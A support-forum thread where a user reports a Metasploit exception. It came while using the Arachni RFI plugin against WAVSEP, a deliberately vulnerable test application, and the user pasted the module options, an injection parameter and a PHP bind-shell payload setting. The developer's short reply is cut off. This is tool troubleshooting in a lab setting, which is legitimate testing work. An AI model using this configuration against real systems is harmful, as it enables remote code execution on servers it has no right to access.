Got exception while using arachni_php_include msf plugin to exploit rfi vulnerability
Hi Tasos,
I ran arachni scan against WAVSEP(https://code.google.com/p/wavsep/),
particularly the rfi section. And I got the metareport containing
lots of rfi vulnerabilities. Then I loaded the metareport into
metasploit, pick one vulnerability and try to use arachni_manual to
exploit it.
But I got an exception: [-] Exploit failed: undefined method
`remove_resource' for nil:NilClass. Is this a normal way of saying:
cannot exploit? Or it's a unexpected ruby exception needs to
debug?
Below is the output I got on the terminal:
msf exploit(arachni_php_include) > arachni_manual 5
[*] Using unix/webapp/arachni_php_include .
[*] Preparing datastore for 'Remote File Inclusion' vulnerability @ 10.1.10.129/wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp ...
SRVHOST => 127.0.0.1
SRVPORT => 14471
RHOST => 10.1.10.129
RPORT => 8080
LHOST => 127.0.0.1
LPORT => 6054
SSL => false
GET => target=XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE
PATH => /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[*] Done!
PAYLOAD => php/bind_php
msf exploit(arachni_php_include) > show options
Module options (exploit/unix/webapp/arachni_php_include):
Name Current Setting Required Description
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) GET target=XXinjectionXX no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) PATH /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp yes The path to the vulnerable script. POST no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) Proxies no Use a proxy chain RHOST 10.1.10.129 yes The target address RPORT 8080 yes The target port SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 14471 yes The local port to listen on. SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (php/bind_php): Name Current Setting Required Description
LPORT 6054 yes The listen port RHOST 10.1.10.129 no The target address
Exploit target:
Id Name
0 Automatic
msf exploit(arachni_php_include) > exploit [*] Using URL: http://127.0.0.1:14471/LiCArBFVeO [*] PHP include server started. [*] Started bind handler [*] Sending HTTP request for /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp [-] Exploit failed: undefined method `remove_resource' for nil:NilClass
Comments are currently closed for this discussion. You can start a new one.
Keyboard shortcuts
Generic
? | Show this help |
---|---|
ESC | Blurs the current field |
Comment Form
r | Focus the comment reply box |
---|---|
^ + ↩ | Submit the comment |
You can use Command ⌘
instead of Control ^
on Mac
Support Staff 1 Posted by Tasos Laskos on 11 Jun, 2014 05:57 PM
Hi there,
As the relevant file already says:
Cheers
Tasos Laskos closed this discussion on 11 Jun, 2014 05:57 PM.